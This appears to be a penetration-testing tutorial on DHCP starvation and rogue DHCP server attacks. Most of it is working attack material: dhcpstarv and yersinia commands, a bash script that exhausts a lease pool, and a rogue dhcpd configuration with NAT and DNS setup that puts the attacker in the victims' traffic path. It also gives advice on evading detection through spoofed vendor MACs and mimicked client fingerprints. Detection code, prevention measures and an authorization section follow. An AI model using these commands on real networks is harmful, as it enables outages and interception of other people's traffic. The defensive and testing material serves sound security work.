DHCP Attacks

Understanding DHCP Attacks - IP Allocation Manipulation

What Are DHCP Attacks?

Simple Definition: DHCP attacks either exhaust all available IP addresses so legitimate users can’t connect to the network, or provide fake network settings that redirect user traffic through the attacker’s system.

Technical Definition: DHCP attacks exploit the Dynamic Host Configuration Protocol through resource exhaustion (DHCP starvation) or service impersonation (rogue DHCP servers) to deny network access or redirect traffic for man-in-the-middle positioning.

Why DHCP Attacks Work

DHCP attacks succeed due to protocol design limitations:

  • No Authentication: Neither side of the exchange is authenticated; the server leases to any client MAC, and the client accepts any server that answers
  • First Response Wins: Clients take the first DHCPOFFER that arrives, so whoever answers fastest sets the configuration
  • Finite IP Pool: A scope holds a fixed number of leases, and every fake MAC consumes one for the full lease time
  • Trust-Based Assignment: Clients apply every option in the reply (gateway, DNS, domain, static routes) without validation

Attack Process Breakdown

DHCP Starvation Attack

  1. Pool Discovery: Identify DHCP server and available IP range
  2. Request Flooding: Send numerous DHCP requests with unique MAC addresses
  3. Address Exhaustion: Consume all available IP addresses in the pool
  4. Service Denial: Legitimate clients cannot obtain IP addresses
  5. Network Isolation: Devices lose connectivity or fail to connect

Rogue DHCP Server Attack

  1. Malicious Server Setup: Configure DHCP server with attacker-controlled settings
  2. DNS Redirection: Point clients to attacker-controlled DNS server
  3. Gateway Spoofing: Configure attacker as default gateway
  4. Response Racing: Respond faster than legitimate DHCP server
  5. Traffic Interception: All client traffic flows through attacker

Real-World Impact

Network Service Denial: Prevent new devices from connecting to the network

Traffic Redirection: Route all user traffic through attacker-controlled systems

DNS Manipulation: Redirect users to malicious websites or capture credentials

Corporate Network Compromise: Intercept business communications and sensitive data

WiFi Network Takeover: Control all wireless client network configuration

Technical Concepts

DHCP Protocol Fundamentals

DHCP Process (DORA):

  1. Discover: Client broadcasts DHCP discover request
  2. Offer: Server responds with IP address offer
  3. Request: Client requests the offered address
  4. Acknowledge: Server confirms assignment

DHCP Components:

  • IP Address Pool: Range of assignable addresses
  • Lease Duration: How long client can use address
  • Network Options: Gateway, DNS, domain name
  • Reservations: Static assignments based on MAC

DHCP Message Types

Key Messages:

  • DHCP Discover (Type 1): Client seeking IP address
  • DHCP Offer (Type 2): Server offering IP address
  • DHCP Request (Type 3): Client requesting specific IP
  • DHCP ACK (Type 5): Server confirming assignment
  • DHCP NAK (Type 6): Server refusing a Request, e.g. for an address it will not or cannot lease
  • DHCP Release (Type 7): Client releasing IP address

The type code travels in option 53 of the message; the rest of the packet is the fixed BOOTP header (op, xid, client hardware address, offered address) followed by the options.
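As an added example, not code from the original page, the following stand-alone Python builds and decodes these messages with the standard library only: the DISCOVER a client (or a starvation tool, with a fresh MAC per packet) sends, and the BOOTREPLY OFFER a rogue server would answer it with, carrying its own address as router and DNS. No packets are sent; the addresses 192.168.1.10 and 192.168.1.150 are the example values reused from the dhcpd configuration later on this page.

```python
"""Build and parse DHCP (RFC 2131/2132) messages with the standard library only.

Nothing here touches the network: it shows the bytes a starvation tool or a
rogue server puts on the wire, and how a sensor decodes them.
"""
import ipaddress
import os
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"        # marks the start of the options field
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 4: "DECLINE",
             5: "ACK", 6: "NAK", 7: "RELEASE", 8: "INFORM"}   # option 53 values
BOOTREQUEST, BOOTREPLY = 1, 2


def random_mac(prefix=b"\x02"):
    """Fresh client MAC per request; 02: is the locally administered range.
    Pass a 3-byte vendor OUI as prefix to blend in with existing hosts."""
    return prefix + os.urandom(6 - len(prefix))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip4(addr):
    return ipaddress.IPv4Address(addr).packed


def build_dhcp(op, msg_type, chaddr, xid, yiaddr="0.0.0.0", opts=()):
    """236-byte BOOTP header, magic cookie, option 53 first, then opts, then end (255)."""
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        op, 1, 6, 0,                               # op, htype=Ethernet, hlen=6, hops
        xid, 0, 0x8000,                            # xid, secs, flags: broadcast bit
        b"\0" * 4, ip4(yiaddr), b"\0" * 4, b"\0" * 4,   # ciaddr, yiaddr, siaddr, giaddr
        chaddr.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    body = bytearray(MAGIC_COOKIE)
    for code, data in [(53, bytes([msg_type]))] + list(opts):
        body += bytes([code, len(data)]) + data
    return header + bytes(body) + b"\xff"


def parse_dhcp(pkt):
    """Return header fields plus a {code: raw_bytes} option map."""
    if len(pkt) < 240 or pkt[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    op, _htype, hlen, _hops, xid = struct.unpack("!BBBBI", pkt[:8])
    msg = {"op": op, "xid": xid,
           "yiaddr": str(ipaddress.IPv4Address(pkt[16:20])),
           "chaddr": mac_str(pkt[28:28 + hlen]), "options": {}}
    i = 240
    while i < len(pkt) and pkt[i] != 255:
        if pkt[i] == 0:                            # pad option, no length byte
            i += 1
            continue
        code, length = pkt[i], pkt[i + 1]
        msg["options"][code] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    return msg


def ip_list(raw):
    """Options 3 (routers) and 6 (DNS) carry one or more packed IPv4 addresses."""
    return [str(ipaddress.IPv4Address(raw[k:k + 4])) for k in range(0, len(raw), 4)]


def summarize(pkt):
    m = parse_dhcp(pkt)
    o = m["options"]
    return {"type": MSG_TYPES.get(o.get(53, b"\0")[0], "?"),
            "chaddr": m["chaddr"], "yiaddr": m["yiaddr"],
            "server_id": ip_list(o[54])[0] if 54 in o else None,
            "routers": ip_list(o.get(3, b"")), "dns": ip_list(o.get(6, b""))}


def make_discover(mac=None, xid=None):
    """Client step of DORA; option 55 asks for mask, router, DNS, domain name."""
    mac = mac or random_mac()
    xid = int.from_bytes(os.urandom(4), "big") if xid is None else xid
    return build_dhcp(BOOTREQUEST, 1, mac, xid, opts=[(55, bytes([1, 3, 6, 15]))])


def make_rogue_offer(discover, offered_ip, attacker_ip, lease=600):
    """Server step of DORA as a rogue server answers it: the client's xid and
    chaddr echoed back, attacker_ip as server id, router and DNS."""
    d = parse_dhcp(discover)
    chaddr = bytes.fromhex(d["chaddr"].replace(":", ""))
    opts = [(54, ip4(attacker_ip)), (51, struct.pack("!I", lease)),
            (1, ip4("255.255.255.0")), (3, ip4(attacker_ip)), (6, ip4(attacker_ip))]
    return build_dhcp(BOOTREPLY, 2, chaddr, d["xid"], yiaddr=offered_ip, opts=opts)


def starvation_batch(n):
    """What a starvation tool emits: n DISCOVERs, each from a different MAC."""
    return [make_discover() for _ in range(n)]


if __name__ == "__main__":
    disc = make_discover(mac=bytes.fromhex("020000aabbcc"), xid=0x12345678)
    offer = make_rogue_offer(disc, "192.168.1.150", "192.168.1.10")
    print(summarize(disc))
    print(summarize(offer))
    print(len({summarize(p)["chaddr"] for p in starvation_batch(50)}), "distinct client MACs")
```

Feeding the output of `make_discover` into a raw UDP socket bound to port 68 and broadcast to 255.255.255.255:67 is all a starvation tool adds; the server-side half shows why a rogue OFFER is indistinguishable from a real one to the client: nothing in the packet proves who sent it.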

Attack Vectors

  • Starvation Attack: Exhaust DHCP pool with fake requests
  • Rogue Server: Provide malicious network configuration
  • Option Manipulation: Inject malicious DHCP options (gateway, DNS, domain, static routes)
  • Relay Attack: Manipulate DHCP relay agents and the Option 82 data they insert

Technical Implementation

Prerequisites

Network Requirements:

  • Access to network segment with DHCP services
  • Ability to send/receive broadcast traffic
  • Knowledge of network IP ranges

Essential Tools:

  • Dhcpstarv: DHCP starvation attack tool
  • Yersinia: Comprehensive Layer 2 attack framework
  • DHCPd: ISC DHCP server for rogue server attacks
  • Nmap: DHCP discovery and reconnaissance

Essential Command Sequence

Step 1: DHCP Reconnaissance

# Discover DHCP servers on network (dhcp-discover sends a unicast DHCPINFORM to UDP/67 on each target)
sudo nmap -sU -p 67 --script dhcp-discover 192.168.1.0/24
# Identifies active DHCP servers
# Shows server identifier, subnet mask and lease time
# Reveals DNS servers, gateway and domain handed to clients

# Or ask the segment the way a client does (broadcast DHCPDISCOVER on the chosen interface)
sudo nmap --script broadcast-dhcp-discover -e eth0
# Every server that answers is a DHCP server on this segment; more than one is a finding in itself

# Monitor DHCP traffic
sudo tcpdump -i eth0 -n -v 'port 67 or port 68'
# Port 67: DHCP server port
# Port 68: DHCP client port
# -v prints the option 53 type; observe the normal DISCOVER/OFFER/REQUEST/ACK pattern

# Test current DHCP allocation
sudo dhclient -r eth0  # Release current lease
sudo dhclient -v eth0  # Request new lease; -v prints the DORA exchange
# Verify DHCP service is active and responsive

Purpose: Identify DHCP infrastructure and understand network configuration before launching attacks.

Step 2: DHCP Pool Assessment

# Estimate DHCP pool size: repeated DISCOVERs with random client MACs each draw a fresh offer
sudo nmap -sU -p 67 --script dhcp-discover \
  --script-args dhcp-discover.dhcptype=DHCPDISCOVER,dhcp-discover.mac=random,dhcp-discover.requests=10 192.168.1.1
# The offered addresses show where the pool starts and how it is allocated
# Helps determine effort required for starvation

# Monitor lease assignments
tail -f /var/lib/dhcp/dhcpd.leases  # If access to DHCP server
# Shows current lease database
# Identifies active vs available addresses

Purpose: Understand DHCP server capacity and current utilization for effective attack planning.

Step 3: Execute DHCP Starvation

Using Dhcpstarv:

# Basic DHCP starvation attack
dhcpstarv -i eth0
# -i eth0: Network interface for attack
# Generates DHCP requests with random MAC addresses
# Continues until stopped or pool exhausted

# Monitor attack progress
sudo tcpdump -i eth0 -n -v 'port 67 or port 68' | grep --line-buffered -E 'Discover|Offer|Request|ACK|NACK'
# -v makes tcpdump print the option 53 message type, so the counts above can be tallied per type
# Offers stop, and NACKs to Requests appear, once the pool is exhausted

Using Yersinia:

# Launch Yersinia interactive (ncurses) mode
sudo yersinia -I
# Press g and select DHCP, then x and choose "sending DISCOVER packet"
# Source MAC addresses are generated per packet automatically

# Command-line DHCP exhaustion
sudo yersinia dhcp -attack 1 -i eth0
# Attack 1: "sending DISCOVER packet", the starvation DoS; yersinia dhcp -h lists the others
# Automatically generates requests with random source MACs

Custom Starvation Script:

#!/bin/bash
# Systematic DHCP pool exhaustion: walk 254 client MACs through a real dhclient,
# one lease each. Slow, but needs no attack tooling.
IFACE=eth0
for i in {1..254}; do
    # Generate unique locally administered MAC (02: prefix) with random low bytes
    MAC="02:$(printf "%02x" "$i"):$(openssl rand -hex 4 | sed 's/../&:/g;s/:$//')"

    # Stop the previous dhclient WITHOUT releasing its lease (-x); a DHCPRELEASE
    # would hand the address straight back to the pool and defeat the attack
    dhclient -x "$IFACE" 2>/dev/null
    ip link set dev "$IFACE" down
    ip link set dev "$IFACE" address "$MAC"   # interface must be down to change the MAC
    ip link set dev "$IFACE" up

    # Request a lease as this MAC; give up after 5 seconds (no offer = pool likely empty)
    if timeout 5 dhclient "$IFACE"; then
        echo "Lease obtained as $MAC"
    else
        echo "No lease for $MAC"
    fi
done

Step 4: Deploy Rogue DHCP Server

Install and Configure DHCPd:

# Install DHCP server software
apt update && apt install isc-dhcp-server

# The rogue server must hold an address in the subnet it serves, and dhcpd must be told which interface to use
ip addr add 192.168.1.10/24 dev eth0
sed -i 's/^INTERFACESv4=.*/INTERFACESv4="eth0"/' /etc/default/isc-dhcp-server

# Create malicious DHCP configuration
cat > /etc/dhcp/dhcpd.conf << EOF
authoritative;     # NAK clients renewing addresses this server has no lease for, pushing them back to DISCOVER
default-lease-time 600;
max-lease-time 7200;

subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.150 192.168.1.200;        # Pick a range the legitimate server does not hand out, or clients see address conflicts
    option routers 192.168.1.10;              # Attacker as gateway
    option domain-name-servers 192.168.1.10;  # Attacker DNS
    option domain-name "malicious.local";
    option broadcast-address 192.168.1.255;
}
EOF
# Configure attacker IP as gateway and DNS server
# Clients will route all traffic through attacker

# Start rogue DHCP server
systemctl start isc-dhcp-server
systemctl status isc-dhcp-server
journalctl -u isc-dhcp-server -n 20   # "No subnet declaration for eth0" means the interface address above is missing

Configure Traffic Interception:

# Enable IP forwarding for gateway role
sysctl -w net.ipv4.ip_forward=1

# Set up NAT so victims on eth0 still reach the internet through the attacker's uplink (eth1);
# without working forwarding the victims simply go offline and the attack is noticed immediately
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# Configure DNS interception: the attacker host's own upstream resolver, plus a local
# resolver listening on 192.168.1.10 that answers (and selectively falsifies) victim queries
echo "nameserver 8.8.8.8" > /etc/resolv.conf
systemctl start bind9  # If running local DNS; configure the zones to answer falsely

Step 5: Verify Attack Success

# Monitor DHCP lease assignments
tail -f /var/lib/dhcp/dhcpd.leases
# Shows clients receiving malicious configuration
# Confirms rogue server is responding to clients

# Test client redirection
# From victim machine:
nslookup google.com
# Should resolve through attacker DNS

# Verify traffic interception
tcpdump -i eth0 -nn 'port 80 or port 443'
# Should see client HTTP/HTTPS traffic
# Confirms successful traffic redirection

Purpose: Confirm clients are receiving malicious DHCP configuration and traffic is being intercepted.

Attack Variations

MAC Selection in Starvation Attacks

# A starvation flood is aimed at the server's pool, not at particular clients, so there is no
# per-device targeting; what the MAC choice buys is evasion. Sequential or all-02: addresses
# stand out in a lease table, while a real vendor OUI blends in with hosts already present,
# e.g. 00:50:56 (VMware) or 08:00:27 (VirtualBox)
# In the custom script above, replace the "02:$(printf "%02x" "$i")" prefix with such an OUI;
# dhcpstarv and yersinia choose their own source MACs
# Useful in mixed physical/virtual environments where those OUIs already fill the lease table

Option 82 Relay Attacks

# Option 82 (Relay Agent Information) is inserted by relay agents and carries Circuit-ID / Remote-ID
# Servers and DHCP snooping may assign or restrict leases based on it
# Spoofing it requires understanding of network topology and can bypass some DHCP security measures

# Monitor for relay agent information (tcpdump names option 82 "Agent-Information")
sudo tcpdump -i eth0 -n -vv 'port 67' | grep --line-buffered -i -B5 -A5 'Agent-Information'

Resolver Redirection via DHCP

# This is not DNS cache poisoning: no cache is corrupted. The DHCP reply simply names the
# attacker's host as the resolver, so every lookup is answered by the attacker, who can redirect
# specific domains and forward everything else honestly
# More targeted than complete traffic interception

# Configure DNS redirection with a fallback
cat >> /etc/dhcp/dhcpd.conf << EOF
option domain-name-servers 192.168.1.10, 8.8.8.8;
EOF
# Attacker DNS first, legitimate backup
# Caveat: clients only fall back to the second server when the first fails to answer, so the
# attacker resolver must stay responsive or the victims quietly move to the legitimate one

Common Issues and Solutions

Problem: DHCP starvation not affecting legitimate clients

  • Solution: Check for DHCP reservations and additional scopes, make sure fake leases are never released (a DHCPRELEASE hands the address straight back), increase attack intensity, target correct network segment

Problem: Rogue DHCP responses ignored by clients

  • Solution: Ensure faster response than legitimate server, check network positioning; if the switch runs DHCP snooping, OFFERs from an access port are dropped before any client sees them

Problem: Clients lose all connectivity with rogue server

  • Solution: Verify IP forwarding enabled, configure proper NAT rules

Problem: Attack detected and blocked

  • Solution: Use legitimate-looking MAC addresses, reduce request frequency, vary timing

Advanced Techniques

DHCP Fingerprinting Evasion

# Mimic legitimate client DHCP fingerprints
# Fingerprinting systems key on option 55 (parameter request list), option 60 (vendor class) and option order
# Match what a common device sends so the attack host does not stand out in the lease table

# Example: mimic a Windows 7 client from dhclient ("send" statements set what goes on the wire)
cat > /tmp/win-dhclient.conf << EOF
send dhcp-parameter-request-list 1,15,3,6,44,46,47,31,33,121,249,43;
send vendor-class-identifier "MSFT 5.0";
send host-name "DESKTOP-PC01";
EOF
sudo dhclient -cf /tmp/win-dhclient.conf -v eth0

Combining DHCP with Other Attacks

# DHCP + ARP spoofing for enhanced control
# Step 1: Poison DHCP to become gateway
# Step 2: ARP spoof for granular traffic control

# DHCP + DNS spoofing
# Control both IP assignment and name resolution

Detection and Prevention

Detection Indicators

  • Unusual number of DHCP requests from single host
  • DHCP requests with sequential or suspicious MAC addresses
  • Multiple DHCP servers responding on network
  • Clients receiving unexpected network configuration
  • Rapid DHCP pool exhaustion
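The indicators above turned into code, as an added example that is not part of the original page: a standard-library Python detector run over a constructed event list standing in for decoded DHCP traffic or a DHCP-snooping log. It assumes 192.168.1.1 is the legitimate server and reuses 192.168.1.10 as the attacker address from the rogue-server configuration on this page; the events are constructed, not captured.

```python
"""Detect the DHCP indicators listed above over decoded DHCP events.

Standard library only.  Each event is one DHCP message as a sensor or a
DHCP-snooping log would record it: time, message type, client MAC, and for
server messages the server identifier (option 54) plus the routers (option 3)
and DNS servers (option 6) it pushed.
"""

LEGIT = "192.168.1.1"     # assumed legitimate server
ROGUE = "192.168.1.10"    # attacker address reused from the dhcpd example

# Constructed sample, not captured traffic: one legitimate lease, then a
# starvation burst from sequential MACs, then a rogue server answering with
# itself as gateway and resolver.
EVENTS = [
    {"t": 0.0, "type": "DISCOVER", "chaddr": "3c:52:82:10:aa:01"},
    {"t": 0.1, "type": "OFFER", "chaddr": "3c:52:82:10:aa:01",
     "server_id": LEGIT, "routers": [LEGIT], "dns": [LEGIT]},
    {"t": 0.2, "type": "REQUEST", "chaddr": "3c:52:82:10:aa:01"},
    {"t": 0.3, "type": "ACK", "chaddr": "3c:52:82:10:aa:01",
     "server_id": LEGIT, "routers": [LEGIT], "dns": [LEGIT]},
]
EVENTS += [{"t": 10 + i * 0.05, "type": "DISCOVER",
            "chaddr": f"02:00:00:00:00:{i:02x}"} for i in range(40)]
EVENTS += [
    {"t": 20.0, "type": "DISCOVER", "chaddr": "3c:52:82:10:aa:02"},
    {"t": 20.05, "type": "OFFER", "chaddr": "3c:52:82:10:aa:02",
     "server_id": ROGUE, "routers": [ROGUE], "dns": [ROGUE]},
]

SERVER_MSGS = ("OFFER", "ACK", "NAK")


def detect(events, known_servers, expected_routers, expected_dns,
           window=10.0, max_new_clients=20, min_run=8):
    """Return alert strings; an empty list means nothing suspicious."""
    alerts = []
    events = sorted(events, key=lambda e: e["t"])
    discovers = [e for e in events if e["type"] == "DISCOVER"]

    # Indicator: rapid pool exhaustion. Slide a window over the DISCOVERs and
    # count distinct client MACs; a real segment does not see dozens of
    # brand-new hosts in ten seconds.
    for i, e in enumerate(discovers):
        macs = {d["chaddr"] for d in discovers[i:] if d["t"] - e["t"] <= window}
        if len(macs) > max_new_clients:
            alerts.append(f"starvation: {len(macs)} distinct clients within "
                          f"{window:g}s starting t={e['t']:g}")
            break

    # Indicator: sequential MACs. Scripts that increment a counter produce a
    # run of consecutive 48-bit values; real vendor MACs do not.
    nums = sorted({int(e["chaddr"].replace(":", ""), 16) for e in discovers})
    run = best = 1
    for a, b in zip(nums, nums[1:]):
        run = run + 1 if b - a == 1 else 1
        best = max(best, run)
    if best >= min_run:
        alerts.append(f"sequential MACs: run of {best} consecutive client addresses")

    # Indicators: unknown server, multiple servers, unexpected configuration.
    seen = set()
    for e in events:
        if e["type"] not in SERVER_MSGS:
            continue
        sid = e.get("server_id")
        if sid not in known_servers and sid not in seen:
            alerts.append(f"rogue server: {e['type']} from unknown server id {sid}")
        seen.add(sid)
        for key, expected in (("routers", expected_routers), ("dns", expected_dns)):
            bad = [x for x in e.get(key, []) if x not in expected]
            if bad:
                alerts.append(f"unexpected {key} {bad} pushed by {sid} to {e['chaddr']}")
    if len(seen) > 1:
        alerts.append(f"multiple DHCP servers answering: {sorted(seen)}")
    return alerts


def run_sample():
    return detect(EVENTS, {LEGIT}, {LEGIT}, {LEGIT})


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

The thresholds (20 new clients per 10 s, a run of 8 consecutive MACs) are starting points to tune against a baseline of the segment; the server-identity and option checks need no tuning, since the set of legitimate servers, gateways and resolvers on a managed network is known in advance.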

Prevention Measures

DHCP Snooping:

  • Switch marks the ports facing the real DHCP server (or its relay) as trusted; every access port is untrusted
  • Drops DHCPOFFER/ACK/NAK arriving on untrusted ports, so a rogue server on an access port is never heard
  • Builds a binding table (MAC, IP, lease, VLAN, port) from the exchanges it sees, which Dynamic ARP Inspection and IP Source Guard then enforce
  • Rate-limits DHCP messages per untrusted port, so a starvation flood shuts down the attacker's port rather than the pool

Port Security:

  • Limit number of MAC addresses per switch port
  • Prevents MAC address spoofing for starvation
  • Automatically disables ports with violations

DHCP Authentication:

  • RFC 3118 defines authenticated DHCP messages, but almost no client or server ships with it enabled, so do not plan on it
  • The realistic substitute is authenticating the port: 802.1X/NAC before a device may talk to DHCP at all
  • Have trusted relays insert Option 82 so the server can tie each lease to a switch port and reject requests without it

Network Design:

  • Segregate DHCP servers on protected VLANs
  • Use dedicated DHCP relay agents
  • Implement network access control (NAC)

Professional Context

Legitimate Use Cases

  • Security Testing: Validating DHCP security configurations
  • Network Resilience: Testing DHCP failover and recovery
  • Penetration Testing: Demonstrating network access control weaknesses
  • Infrastructure Assessment: Identifying DHCP service dependencies

Legal and Ethical Requirements

Authorization: DHCP attacks can cause widespread network outages - explicit written permission essential

Service Impact: Document potential for disrupting critical network services

Recovery Procedures: Ensure ability to restore normal DHCP operation quickly

Scope Limitations: Define which network segments are acceptable for DHCP testing


DHCP attacks demonstrate the importance of securing fundamental network services, as compromise can provide widespread network access and traffic interception capabilities.